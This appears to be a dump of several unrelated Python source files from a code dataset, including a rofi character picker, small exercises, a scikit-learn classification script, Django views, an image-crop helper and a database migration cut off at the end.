self.load_from_file(file_name)\n\n return entries\n\n def load_from_file(self, file_name: str) -> str:\n if os.path.isfile(file_name):\n actual_file_name = file_name\n else:\n raise FileNotFoundError(f\"Couldn't find file {file_name}\")\n\n with open(actual_file_name, \"r\") as file:\n return file.readlines()\n\n def load_all_characters(self) -> str:\n characters = \"\"\n\n directory = os.path.join(os.path.dirname(__file__), \"data\")\n for filename in os.listdir(directory):\n with open(os.path.join(directory, filename), \"r\") as file:\n characters = characters + file.read()\n return characters\n\n def load_recent_characters(self, max: int) -> List[str]:\n try:\n with open(os.path.join(BaseDirectory.xdg_data_home, 'rofi-generic', 'recent'), 'r') as file:\n return file.read().strip().split('\\n')[:max]\n except FileNotFoundError:\n return []\n\n def format_recent_characters(self) -> str:\n pairings = [f'{(index + 1) % 10}: {character}' for index, character in\n enumerate(self.load_recent_characters(self.args.max_recent))]\n\n return ' | '.join(pairings)\n\n def open_main_rofi_window(self) -> Tuple[int, str]:\n rofi_args = self.args.rofi_args\n lines = self.read_input_files()\n prompt = self.args.prompt\n\n parameters = [\n 'rofi',\n '-dmenu',\n '-markup-rows',\n '-i',\n '-multi-select',\n '-p',\n prompt,\n '-kb-custom-11',\n 'Alt+c',\n '-kb-custom-12',\n 'Alt+t',\n '-kb-custom-13',\n 'Alt+p',\n '-kb-custom-14',\n 'Alt+u',\n '-kb-custom-15',\n 'Alt+i',\n *rofi_args\n ]\n\n # TODO(g.seux): deal with recent selections\n #recent_characters = self.format_recent_characters()\n #if len(recent_characters) > 0:\n # parameters.extend(['-mesg', recent_characters])\n\n rofi = run(\n parameters,\n input=''.join(lines),\n capture_output=True,\n encoding='utf-8'\n )\n return rofi.returncode, rofi.stdout\n\n def process_chosen_characters(\n self,\n chosen_characters: List[str]\n ) -> str:\n\n result = \"\"\n for line in chosen_characters:\n character = line.split(\" \")[0]\n\n characters_with_skin_tone = ''\n for element in character:\n if element in self.skin_tone_selectable_emojis:\n characters_with_skin_tone += self.select_skin_tone(element)\n else:\n characters_with_skin_tone += element\n\n result += characters_with_skin_tone\n\n return result\n\n def save_characters_to_recent_file(self, characters: str):\n max_recent_from_conf = self.args.max_recent\n\n old_file_name = os.path.join(BaseDirectory.xdg_data_home, 'rofi-generic', 'recent')\n new_file_name = os.path.join(BaseDirectory.xdg_data_home, 'rofi-generic', 'recent_temp')\n\n max_recent = min(max_recent_from_conf, 10)\n\n os.makedirs(os.path.dirname(new_file_name), exist_ok=True)\n with open(new_file_name, 'w+') as new_file:\n new_file.write(characters + '\\n')\n\n try:\n with open(old_file_name, 'r') as old_file:\n index = 0\n for line in old_file:\n if characters == line.strip():\n continue\n if index == max_recent - 1:\n break\n new_file.write(line)\n index = index + 1\n\n os.remove(old_file_name)\n except FileNotFoundError:\n pass\n\n os.rename(new_file_name, old_file_name)\n\n def append_to_favorites_file(self, characters: str):\n file_name = os.path.join(BaseDirectory.xdg_data_home, 'rofi-generic', 'favorites')\n\n os.makedirs(os.path.dirname(file_name), exist_ok=True)\n with open(file_name, 'a+') as file:\n file.write(characters + '\\n')\n\n def default_handle(self, output: str):\n if self.args.copy_only:\n self.clipboarder.copy_characters_to_clipboard(output)\n elif self.args.insert_with_clipboard:\n self.clipboarder.copy_paste_characters(output, self.active_window, self.typer)\n else:\n self.typer.type_characters(output, self.active_window)\n\n def default_handle_recent_character(self, position: int):\n recent_characters = self.load_recent_characters(position)\n\n self.default_handle(recent_characters[position - 1].strip())\n\n\ndef main():\n RofiGeneric()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"rofigeneric/RofiGeneric.py","file_name":"RofiGeneric.py","file_ext":"py","file_size_in_byte":9571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"390986091","text":"\nimport math\ndef primecheck(t):\n for i in range(2,min(int(t**0.5+1),100)):\n if t%i==0:\n return False\n return True\n\ndef divisorreturn(t):\n for i in range(2,int(t**0.5+1)):\n if t%i==0:\n return str(i)\t\n\nN=30\nresult=[]\nfor i in range(int(\"1\"*N,2)+1):\n temp=bin(i)[2:]\n while len(temp) max([sz[\"max\"] for sz in tables]):\n\t\tprint(\"I'm sorry, our tables do not hold parties of that size.\")\n\telif size == 0:\n\t\tprint(\"\\nI see the line is now empty. We are closing for the evening.\\n\")\n\t\tbreak\n\telse:\n\t\t# Only add party to the wait list if that name is not already on it.\n\t\tw = input(\"You will need to wait for a table. What is your name? \")\n\t\n\t\tif w not in wait.keys():\n\t\t\twait[w] = size\n\t\t\tnumber_waiting = len(wait.keys())\n\t\t\tprint(\"Approximate wait time is \",5*number_waiting, \" minutes.\")\n\t\telse:\n\t\t\tprint(\"I'm sorry, we can't serve you tonight. There is already a customer by that name.\")\n\t\n","sub_path":"sessions/2014/flowcontrol/.ex4.soln.py","file_name":".ex4.soln.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64341558","text":"if (__name__ == \"__main__\"):\r\n import sys\r\n\r\ndef time(steps, per_step=1, path= \"time.dat\"):\r\n time_file = open(path,\"w+\")\r\n \r\n for i in range(1,steps,1): # Step size is always 1 since this is just used for number of lines.\r\n time_file.write(\"{0}\\n\".format(i*per_step)) # Default per_step = 1 ps\r\n time_file.close() #\r\n\r\nif (__name__ == \"__main__\"):\r\n steps = int(sys.argv[1])\r\n time(steps)\r\n","sub_path":"protein_scripts/time_dat.py","file_name":"time_dat.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"442060509","text":"import pandas as pd\r\nimport numpy as np\r\nimport sklearn.discriminant_analysis as discrim\r\nimport sklearn.metrics as metrics\r\nimport sklearn.naive_bayes as nb\r\nimport sklearn.svm as svm\r\nimport sklearn.tree as tree\r\nimport grafice\r\n\r\n# Citire date si creare dataframe prin biblioteca Pandas\r\ntabel = pd.read_csv(\"Date2019.csv\", index_col=0)\r\npd.set_option('display.max_columns', None)\r\n#print(tabel)\r\n\r\n# Inlocuirea valorilor lipsa cu media\r\ntabel.replace(\" \", np.nan, inplace=True)\r\ndate_lipsa = tabel.isnull()\r\n#print(date_lipsa)\r\n\r\n# for column in date_lipsa.columns.values.tolist():\r\n# print(column)\r\n# print(date_lipsa[column].value_counts())\r\n# print(\"\")\r\n\r\n# Date lipsa: SalariuMediu, ProcentSalariuMinim, ExportImportRatio\r\nmedie_sal_mediu = tabel[\"SalariuMediu\"].astype(\"float\").mean(axis=0)\r\nprint(\"Media salariului mediu este:\", medie_sal_mediu)\r\ntabel[\"SalariuMediu\"].replace(np.nan, medie_sal_mediu, inplace=True)\r\n\r\nmedie_procent_sal_minim = tabel[\"ProcentSalariuMinim\"].astype(\"float\").mean(axis=0)\r\nprint(\"Media procentului angajatilor platiti cu salariul minim pe economie este:\", medie_procent_sal_minim)\r\ntabel[\"ProcentSalariuMinim\"].replace(np.nan, medie_procent_sal_minim, inplace=True)\r\n\r\nmedie_expimp_ratio = tabel[\"ExportImportRatio\"].astype(\"float\").mean(axis=0)\r\nprint(\"Media raportului dintre export si import este:\", medie_expimp_ratio)\r\ntabel[\"ExportImportRatio\"].replace(np.nan, medie_expimp_ratio, inplace=True)\r\n\r\n# Statistica descriptiva\r\nindicatori_numerici = tabel.describe()\r\n#print(indicatori_numerici)\r\nindicatori_numerici.to_csv(\"Indicatori.csv\")\r\nprint(tabel.describe())\r\n\r\n# Aplicare model de clasificare LDA\r\nvariabile = list(tabel)\r\nnr_variabile = len(variabile)\r\nvariabile_predictor = variabile[:(nr_variabile - 1)]\r\nvariabila_tinta = variabile[nr_variabile - 1]\r\nprint(\"Variabila tinta este:\", variabila_tinta)\r\nprint(\"Variabilele predictoare sunt:\", variabile_predictor)\r\n\r\nx = tabel[variabile_predictor].values\r\ny = tabel[variabila_tinta].values\r\n# print(type(x))\r\n# print(type(y))\r\n\r\n\r\n# Construire model si preluare etichete regiuni\r\nmodel_lda= discrim.LinearDiscriminantAnalysis()\r\nmodel_lda.fit(x, np.ravel(y))\r\nregiuni = model_lda.classes_\r\nprint(\"Regiuni:\", regiuni)\r\n\r\n# Preluare rezultate si aplicare model\r\n# Calcul scoruri discriminante\r\nz = model_lda.transform(x)\r\nn, q = z.shape\r\netichete_z = [\"z\" + str(i) for i in range(1, q + 1)]\r\nnume_instante = list(tabel.index)\r\n\r\n# Tabel scoruri\r\nt_z = pd.DataFrame(z, nume_instante, etichete_z)\r\nt_z.to_csv(\"z.csv\")\r\n\r\n# Calculare centru de grupe\r\ng = model_lda.means_\r\nzg = model_lda.transform(g)\r\nif q > 1:\r\n grafice.biplot(z, zg, y, regiuni)\r\nfor i in range(q):\r\n grafice.distributie(z,i,y,regiuni)\r\n\r\n# Clasificare in setul de invatare\r\nclasificare_b = model_lda.predict(x)\r\ntabel_clasificare_b = pd.DataFrame(\r\n data={\r\n \"Regiunea\": y,\r\n \"Predictie\": clasificare_b\r\n }, index=nume_instante\r\n)\r\ntabel_clasificare_b.to_csv(\"clasif_b.csv\")\r\n\r\n# Izolarea instantelor clasificate eronat\r\ntabel_clasificare_err = tabel_clasificare_b[y != clasificare_b]\r\n#tabel_clasificare_err.to_csv(\"clasif_eronata.csv\")\r\n\r\n# Calcul matrice clasificari eronate si aplicare pe setul de invatare\r\nmat_conf = metrics.confusion_matrix(y, clasificare_b)\r\nt_mat_conf = pd.DataFrame(mat_conf, regiuni, regiuni)\r\nt_mat_conf[\"Acuratete\"] = np.diagonal(mat_conf) * 100 / np.sum(mat_conf, axis=1)\r\nprint(t_mat_conf)\r\n#t_mat_conf.to_csv(\"mat_conf.csv\")\r\nacuratete_globala = sum(np.diagonal(mat_conf)) * 100 / n\r\nprint(\"Acuratete globala:\", sum(np.diagonal(mat_conf)) * 100 / n)\r\n\r\n\r\n# Aplicarea modelului pe test (date 2014)\r\nset_testare = pd.read_csv(\"Date2014.csv\", index_col=0)\r\nx_testare = set_testare[variabile_predictor].values\r\npredictie = model_lda.predict(x_testare)\r\nset_testare[\"Predictie_lda\"] = predictie\r\n\r\n# Clasificare in setul de testare\r\nclasificare_test= pd.DataFrame(\r\n data = {\r\n \"Regiunea\" : y,\r\n \"Predictie\" : predictie\r\n }, index=nume_instante\r\n)\r\nclasificare_test.to_csv(\"clasif_test.csv\")\r\n\r\n# Izolarea instantelor clasificate eronat\r\ntabel_clasificare_err_test = clasificare_test[y != predictie]\r\n#tabel_clasificare_err_test.to_csv(\"clasif_eronata_test.csv\")\r\n\r\n# Calcul matrice clasificari eronate si aplicare pe setul de testare\r\nmat_conf_test = metrics.confusion_matrix(y, predictie)\r\nt_mat_conf_test = pd.DataFrame(mat_conf_test, regiuni,regiuni)\r\nt_mat_conf_test[\"Acuratete\"] = np.diagonal(mat_conf_test) * 100 / np.sum(mat_conf_test, axis=1)\r\nprint(t_mat_conf_test)\r\n#t_mat_conf_test.to_csv(\"mat_conf_test.csv\")\r\nacuratete_test = sum(np.diagonal(mat_conf_test)) * 100 / n\r\nprint(\"Acuratete globala pentru setul de testare:\", sum(np.diagonal(mat_conf_test)) * 100 / n)\r\n#\r\n# Construire model bayesian\r\nmodel_bayes = nb.GaussianNB()\r\nmodel_bayes.fit(x, y)\r\n\r\n# Clasificare in setul de invatare\r\nclasificare_b_bayes = model_bayes.predict(x)\r\ntabel_clasificare_b_bayes = pd.DataFrame(\r\n data = {\r\n \"Regiunea\" : y,\r\n \"Predictie\": clasificare_b_bayes\r\n },index=nume_instante\r\n)\r\ntabel_clasificare_b_bayes.to_csv(\"clasif_b_bayes.csv\")\r\n\r\n# Izolarea instantelor clasificate eronat\r\ntabel_clasificare_err_bayes = tabel_clasificare_b_bayes[y != clasificare_b_bayes]\r\n#tabel_clasificare_err_bayes.to_csv(\"clasif_eronata_bayes.csv\")\r\n\r\n# Calcul matrice clasificari eronate si aplicare pe setul de invatare\r\nmat_conf_bayes = metrics.confusion_matrix(y, clasificare_b_bayes)\r\nt_mat_conf_bayes = pd.DataFrame(mat_conf_bayes, regiuni, regiuni)\r\nt_mat_conf_bayes[\"Acuratete\"] = np.diagonal(mat_conf_bayes) * 100 / np.sum(mat_conf_bayes, axis=1)\r\nprint(t_mat_conf_bayes)\r\n#t_mat_conf_bayes.to_csv(\"mat_conf_bayes.csv\")\r\nacuratete_globala_bayes = sum(np.diagonal(mat_conf_bayes)) * 100 / n\r\nprint(\"Acuratete globala model bayesian:\", sum(np.diagonal(mat_conf_bayes)) * 100 / n)\r\n\r\n\r\n# Aplicarea modelului pe test (date 2014)\r\npredictie_bayes = model_bayes.predict(x_testare)\r\nset_testare[\"Predictie_Bayes\"] = predictie_bayes\r\n\r\n# Clasificare in setul de testare\r\nclasificare_test_bayes= pd.DataFrame(\r\n data = {\r\n \"Regiunea\" : y,\r\n \"Predictie\" : predictie_bayes\r\n }, index=nume_instante\r\n)\r\nclasificare_test_bayes.to_csv(\"clasif_test_bayes.csv\")\r\n\r\n# Izolarea instantelor clasificate eronat\r\ntabel_clasificare_err_test_bayes = clasificare_test_bayes[y != predictie_bayes]\r\n# tabel_clasificare_err_test_bayes.to_csv(\"clasif_eronata_test_bayes.csv\")\r\n\r\n# Calcul matrice clasificari eronate si aplicare pe setul de testare\r\nmat_conf_test_bayes = metrics.confusion_matrix(y, predictie_bayes)\r\nt_mat_conf_test_bayes = pd.DataFrame(mat_conf_test_bayes, regiuni,regiuni)\r\nt_mat_conf_test_bayes[\"Acuratete\"] = np.diagonal(mat_conf_test_bayes) * 100 / np.sum(mat_conf_test_bayes, axis=1)\r\nprint(t_mat_conf_test_bayes)\r\n#t_mat_conf_test_bayes.to_csv(\"mat_conf_test_bayes.csv\")\r\nacuratete_test_bayes = sum(np.diagonal(mat_conf_test_bayes)) * 100 / n\r\nprint(\"Acuratete globala model bayesian pentru setul de testare:\", sum(np.diagonal(mat_conf_test_bayes)) * 100 / n)\r\n\r\n\r\n# Constuire model SVM\r\nmodel_svm = svm.SVC()\r\nmodel_svm.fit(x, y)\r\n\r\n# Clasificare in setul de invatare\r\nclasificare_b_svm = model_svm.predict(x)\r\ntabel_clasificare_b_svm = pd.DataFrame(\r\n data = {\r\n \"Regiunea\" : y,\r\n \"Predictie\": clasificare_b_svm\r\n },index=nume_instante\r\n)\r\ntabel_clasificare_b_svm.to_csv(\"clasif_b_svm.csv\")\r\n\r\n# Izolarea instantelor clasificate eronat\r\ntabel_clasificare_err_svm = tabel_clasificare_b_svm[y != clasificare_b_svm]\r\n# tabel_clasificare_err_svm.to_csv(\"clasif_eronata_svm.csv\")\r\n\r\n# Calcul matrice clasificari eronate si aplicare pe setul de invatare\r\nmat_conf_svm = metrics.confusion_matrix(y, clasificare_b_svm)\r\nt_mat_conf_svm = pd.DataFrame(mat_conf_svm, regiuni, regiuni)\r\nt_mat_conf_svm[\"Acuratete\"] = np.diagonal(mat_conf_svm) * 100 / np.sum(mat_conf_svm, axis=1)\r\nprint(t_mat_conf_svm)\r\n#t_mat_conf_svm.to_csv(\"mat_conf_svm.csv\")\r\nacuratete_globala_svm = sum(np.diagonal(mat_conf_svm)) * 100 / n\r\nprint(\"Acuratete globala model svm:\", sum(np.diagonal(mat_conf_svm)) * 100 / n)\r\n\r\n# Aplicarea modelului pe test (date 2014)\r\npredictie_svm = model_svm.predict(x_testare)\r\nset_testare[\"Predictie_SVM\"] = predictie_svm\r\n\r\n# Clasificare in setul de testare\r\nclasificare_test_svm= pd.DataFrame(\r\n data = {\r\n \"Regiunea\" : y,\r\n \"Predictie\" : predictie_svm\r\n }, index=nume_instante\r\n)\r\nclasificare_test_svm.to_csv(\"clasif_test_svm.csv\")\r\n\r\n# Izolarea instantelor clasificate eronat\r\ntabel_clasificare_err_test_svm = clasificare_test_svm[ y!= predictie_svm]\r\n# tabel_clasificare_err_test_svm.to_csv(\"clasif_eronata_test_bayes.csv\")\r\n\r\n#Calcul matrice clasificari eronate si aplicare pe setul de testare\r\nmat_conf_test_svm = metrics.confusion_matrix(y, predictie_svm)\r\nt_mat_conf_test_svm = pd.DataFrame(mat_conf_test_svm, regiuni, regiuni)\r\nt_mat_conf_test_svm[\"Acuratete\"] = np.diagonal(mat_conf_test_svm) * 100 / np.sum(mat_conf_test_svm, axis=1)\r\nprint(t_mat_conf_test_svm)\r\n#t_mat_conf_test_svm.to_csv(\"mat_conf_test_svm.csv\")\r\nacuratete_test_svm = sum(np.diagonal(mat_conf_test_svm)) * 100 / n\r\nprint(\"Acuratete globala model SVM pentru setul de testare:\",sum(np.diagonal(mat_conf_test_svm)) * 100 / n)\r\n\r\n\r\n# Constuire model arbore de decizie\r\nmodel_arbore = tree.DecisionTreeClassifier()\r\nmodel_arbore.fit(x, y)\r\n\r\n# Aplicare pe setul de invatare\r\nclasificare_b_arbore = model_arbore.predict(x)\r\ntabel_clasificare_b_arbore = pd.DataFrame(\r\n data = {\r\n \"Regiunea\" : y,\r\n \"Predictie\" : clasificare_b_arbore\r\n }, index=nume_instante\r\n)\r\ntabel_clasificare_b_arbore.to_csv(\"clasif_b_arbore.csv\")\r\n\r\n# Izolarea instantelor clasificate eronat\r\ntabel_clasificare_err_arbore = tabel_clasificare_b_arbore[y != clasificare_b_arbore]\r\n# tabel_clasificare_err_arbore.to_csv(\"clasif_eronata_arbore.csv\")\r\n\r\n# Calcul matrice clasificari eronate\r\nmat_conf_arbore = metrics.confusion_matrix(y, clasificare_b_arbore)\r\nt_mat_conf_arbore = pd.DataFrame(mat_conf_arbore, regiuni, regiuni)\r\nt_mat_conf_arbore[\"Acuratete\"] = np.diagonal(mat_conf_arbore) * 100 / np.sum(mat_conf_arbore, axis=1)\r\nprint(t_mat_conf_arbore)\r\n#t_mat_conf_arbore.to_csv(\"mat_conf_arbore.csv\")\r\nacuratete_globala_arbore = sum(np.diagonal(mat_conf_arbore)) * 100 / n\r\nprint(\"Acuratete globala model arbore:\", sum(np.diagonal(mat_conf_arbore)) * 100 / n)\r\n\r\n# Aplicarea modelului pe test (date 2014)\r\npredictie_arbore = model_arbore.predict(x_testare)\r\nset_testare[\"Predictie_arbore\"] = predictie_arbore\r\n\r\n# Clasificare in setul de testare\r\nclasificare_test_arbore= pd.DataFrame(\r\n data = {\r\n \"Regiunea\" : y,\r\n \"Predictie\" : predictie_arbore\r\n }, index=nume_instante\r\n)\r\nclasificare_test_arbore.to_csv(\"clasif_test_arbore.csv\")\r\n\r\n# Izolarea instantelor clasificate eronat\r\ntabel_clasificare_err_test_arbore = clasificare_test_arbore[y != predictie_arbore]\r\n# tabel_clasificare_err_test_arbore.to_csv(\"clasif_eronata_test_arbore.csv\")\r\n\r\n# Clasificare_b_arbore = model_arbore.predict(x)\r\nmat_conf_test_arbore = metrics.confusion_matrix(y, predictie_arbore)\r\nt_mat_conf_test_arbore = pd.DataFrame(mat_conf_test_arbore, regiuni, regiuni)\r\nt_mat_conf_test_arbore[\"Acuratete\"] = np.diagonal(mat_conf_test_arbore) * 100 / np.sum(mat_conf_test_arbore, axis=1)\r\nprint(t_mat_conf_test_arbore)\r\n#t_mat_conf_test_arbore.to_csv(\"mat_conf_test_arbore.csv\")\r\nacuratete_test_arbore = sum(np.diagonal(mat_conf_test_arbore)) * 100 /n\r\nprint(\"Acuratete globala model arbore pentru setul de testare:\", sum(np.diagonal(mat_conf_test_arbore)) * 100 /n)\r\n\r\n# Salvarea rezultatelor\r\nset_testare.to_csv(\"Predictie.csv\")\r\n\r\nacuratete_calculata = np.array([acuratete_test, acuratete_test_bayes, acuratete_test_svm, acuratete_test_arbore])\r\npredictii_set_testare = pd.Series(acuratete_calculata, index = ['LDA', 'Bayes', 'SVM', 'Arbore'])\r\n# predictii_grupate_test = predictii_set_testare.groupby(\"Acuratete\")\r\nprint(predictii_set_testare)\r\n\r\nacuratete_globala = [acuratete_globala, acuratete_globala_bayes, acuratete_globala_svm, acuratete_globala_arbore]\r\npredictii_set_invatare = pd.DataFrame(\r\n data = {\r\n \"Tipul Clasificarii Supervizate Set Invatare\": ['LDA', 'Bayes', 'SVM', 'Arbore'],\r\n \"Acuratete\" : acuratete_globala\r\n }\r\n)\r\npredictii_grupate = predictii_set_invatare.groupby(by=\"Acuratete\")\r\nprint(predictii_grupate.first())\r\n\r\ngrafice.show()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"430439425","text":"from django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom shopper.models import DeviceHistory\nfrom shopper.models.card import Card\nfrom shopper.models.card_holder import CardHolder\nfrom shopper.models.device import DeviceStatus\nfrom shopper.models.device_history import DeviceActivity\nfrom shopper.views.forms.card_holder_form import CardHolderForm, CardAssignmentForm\n\n\ndef index(request):\n card_holders = CardHolder.objects.filter(company=request.user.get_profile().company)\n return render(request, 'card_holder/index.html', {'top_nav': 'admin',\n 'side_nav': 'list_card_holders',\n 'card_holders': card_holders})\n\n\ndef _show_new_card_holder_form(form, request, side_nav, action, button_text):\n return render(request, 'template.html', {'top_nav': 'admin',\n 'side_nav': side_nav,\n 'title': 'Card Holders',\n 'header': 'Create Card Holder',\n 'form': form,\n 'action': action,\n 'cancel_link': '/card_holder/list/',\n 'submit_button_text': button_text})\n\n\ndef view(request, card_holder_id):\n card_holder = CardHolder.objects.get(id=card_holder_id)\n\n return render(request, 'card_holder/view.html', {'top_nav': 'admin',\n 'side_nav': 'list_card_holders',\n 'card_holder': card_holder})\n\n\ndef edit(request, card_holder_id):\n card_holder = CardHolder.objects.get(id=card_holder_id)\n form = CardHolderForm(instance=card_holder)\n\n return _show_new_card_holder_form(form, request, \"list_card_holders\", \"/card_holder/{0}/update/\".format(card_holder_id), \"Update\")\n\n\ndef update(request, card_holder_id):\n card_holder = CardHolder.objects.get(id=card_holder_id)\n form = CardHolderForm(data=request.POST, instance=card_holder)\n if form.is_valid():\n form.save()\n messages.add_message(request, messages.INFO, \"Card holder details updated successfully\")\n return HttpResponseRedirect('/card_holder/list/')\n\n messages.add_message(request, messages.ERROR, \"Error occurred while changing card holder details\")\n return _show_new_card_holder_form(form, request)\n\n\ndef change_status(request, card_holder_id, status):\n card_holder = CardHolder.objects.get(id=card_holder_id)\n card_holder.status = status\n card_holder.save()\n messages.add_message(request, messages.INFO, \"Card holder status changed successfully\")\n return HttpResponseRedirect('/card_holder/list/')\n\n\ndef test(request):\n return render(request, \"test.html\", {})\n\n\ndef new(request):\n form = CardHolderForm()\n\n return _show_new_card_holder_form(form, request, \"add_card_holders\", \"/card_holder/create/\", \"Add\")\n\n\ndef create(request):\n form = CardHolderForm(data=request.POST)\n if form.is_valid():\n card_holder = form.save(commit=False)\n card_holder.company = request.user.get_profile().company\n card_holder.save()\n\n messages.add_message(request, messages.INFO, \"{0} cardholder create successfully\".format(card_holder.full_name()))\n return HttpResponseRedirect('/card_holder/list/')\n\n messages.add_message(request, messages.ERROR, \"Error occurred while adding new card holder\")\n return _show_new_card_holder_form(form, request, \"add_card_holders\", \"/card_holder/create/\", \"Add\")\n\n\ndef _render_assignment_form(form, request):\n return render(request, 'template.html', {'top_nav': 'admin',\n 'side_nav': 'list_card_holders',\n 'title': 'Card Holders',\n 'header': 'Assign Card to Card Holder',\n 'form': form,\n 'action': '/card_holder/assign_card/',\n 'submit_button_text': \"Assign Card\",\n 'cancel_link': '/card_holder/list/'})\n\n\ndef assignment(request):\n form = CardAssignmentForm(initial=request.GET)\n return _render_assignment_form(form, request)\n\n\ndef assign_card(request):\n form = CardAssignmentForm(data=request.POST, user=request.user)\n if form.is_valid():\n card = Card.objects.get(company=request.user.get_profile().company, serial_number=request.POST[\"card_serial_number\"])\n card_holder = CardHolder.objects.get(telephone=request.POST[\"card_holder_telephone\"])\n\n if card_holder.card:\n history = DeviceHistory()\n history.user = request.user\n history.activity = DeviceActivity.UNASSIGNED.format(card_holder.description())\n history.save()\n\n card_holder.card.activities.add(history)\n card_holder.card.save()\n\n card_holder.card = card\n card_holder.save()\n\n history = DeviceHistory()\n history.user = request.user\n history.activity = DeviceActivity.ASSIGNED.format(card_holder.description())\n history.save()\n\n card.activities.add(history)\n card.status = DeviceStatus.ACTIVE\n card.save()\n\n messages.add_message(request, messages.INFO, \"Card {0} assigned to {1} successfully\".format(card.serial_number, card_holder.full_name()))\n return HttpResponseRedirect('/card_holder/{0}/view'.format(card_holder.id))\n\n messages.add_message(request, messages.ERROR, \"Error occurred while assigning card to card holder\")\n return _render_assignment_form(form, request)","sub_path":"console/shopper/views/card_holder_views.py","file_name":"card_holder_views.py","file_ext":"py","file_size_in_byte":5883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"182022738","text":"import numpy as np\nimport math\nimport scipy.misc as imLib\n\ndef crop(img, center, scale, res):\n oriWd, oriHt, oriChan = img.shape\n \n ''' new image range in original img coordinate '''\n tmpSize = scale *200\n newUl = [math.floor(center[0] - tmpSize/2), math.floor(center[1] - tmpSize/2)]\n newBr = [math.floor(center[0] + tmpSize/2), math.floor(center[1] + tmpSize/2)]\n \n ''' original image range in new img coordinate '''\n oriUl = np.multiply(newUl, -1)\n oriBr = [oriWd - newBr[0] + tmpSize, oriHt - newBr[1] + tmpSize]\n\n '''\n print('before:')\n print('original coordinate:')\n print('upper left x = ' + str(ul[0]) + ' upper left y = ' + str(ul[1]))\n print('bottom right x = ' + str(br[0]) + ' bottom right y = ' + str(br[1]))\n print('new coordinate:')\n print('upper left x = ' + str(loc_ul[0]) + ' upper left y = ' + str(loc_ul[1]))\n print('bottom right x = ' + str(loc_br[0]) + ' bottom right y = ' + str(loc_br[1]))\n '''\n \n ''' generate black new image '''\n newDim = [newBr[0] - newUl[0], newBr[1] - newUl[1], img.shape[2]]\n newImg = np.zeros(newDim)\n \n ''' crop area of new image beging filled if exceed orignal image range '''\n if oriUl[0] < 0:\n oirUl[0] = 0\n \n if oriUl[1] < 0:\n oriUl[1] = 0\n \n if oriBr[0] > newDim[0]:\n oriBr[0] = newDim[0]\n \n if oriBr[1] > newDim[1]:\n oriBr[1] = newDim[1]\n \n ''' crop area of original image to fill in if exceed new image range '''\n if newUl[0] < 0:\n newUl[0] = 0\n \n if newUl[1] < 0:\n newUl[1] = 0\n \n if newBr[0] > oriWd:\n newBr[0] = oriWd\n \n if newBr[1] > oriHt:\n newBr[1] = oriHt\n \n ''' \n print('after:')\n print('original coordinate:')\n print('upper left x = ' + str(ul[0]) + ' upper left y = ' + str(ul[1]))\n print('bottom right x = ' + str(br[0]) + ' bottom right y = ' + str(br[1]))\n print('new coordinate:')\n print('upper left x = ' + str(loc_ul[0]) + ' upper left y = ' + str(loc_ul[1]))\n print('bottom right x = ' + str(loc_br[0]) + ' bottom right y = ' + str(loc_br[1]))\n '''\n \n newImg[oriUl[0] : oriBr[0], oriUl[1] : oriBr[1]] = img[newUl[0] : newBr[0],\n newUl[1] : newBr[1]]\n newImg = imLib.imresize(newImg, (res, res, 3))\n \n return newImg\n","sub_path":"imgCrop.py","file_name":"imgCrop.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"533873774","text":"\n\n#calss header\nclass _PROVIDE():\n\tdef __init__(self,): \n\t\tself.name = \"PROVIDE\"\n\t\tself.definitions = [u'to give someone something that they need: ', u'(of a law or decision) to say that something must happen if particular conditions exist: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_provide.py","file_name":"_provide.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"109933485","text":"#!/usr/bin/python3\n# gamelibraryproject.py\n# KJ Klamer\n# 1/28/2020\nimport pickle\n\ngames = {1:[\"FPS\",\"Halo 3\",\"Bungie\",\"Microsoft\",\"Xbox 360\",\"2007\",\n \"6.0\",\"Both\",\"30.00\",\"Yes\",\"1/15/2008\",\"This Game Blows Chunks\"]}\n\"\"\"2:[\"Action-Adventure\",\"Just Cause 4\",\"Avalanche Studios\",\"Square Enix\",\n\"PlayStation 4, Xbox One, Microsoft Windows\",\"2018\", \"6.0\",\"Singleplayer\",\n\"Yes\",\"40.00\"],\n3:[]}\"\"\"\ndata_file = open(\"game_lib.pickle\",\"wb\")\npickle.dump(games, data_file)\ndata_file.close()\n\nopen_pickle = open(\"game_lib.pickle\",\"rb\")\nshow_pickle = pickle.load(open_pickle)\nopen_pickle.close()\n\nprint(show_pickle)","sub_path":"gamelist.py","file_name":"gamelist.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"469985661","text":"\"\"\"empty message\n\nRevision ID: 2fd0ab60fe3a\nRevises: 29012e868555\nCreate Date: 2019-02-22 13:39:39.314912\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '2fd0ab60fe3a'\ndown_revision = '29012e868555'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('stardrive_user', 'role')\n # ### end Alembic commands ###\n role = postgresql.ENUM('admin', 'user', name='role')\n role.create(op.get_bind())\n op.add_column('stardrive_user', sa.Column('role', sa.Enum('admin', 'user', name='role'), nullable=True))\n\n\ndef 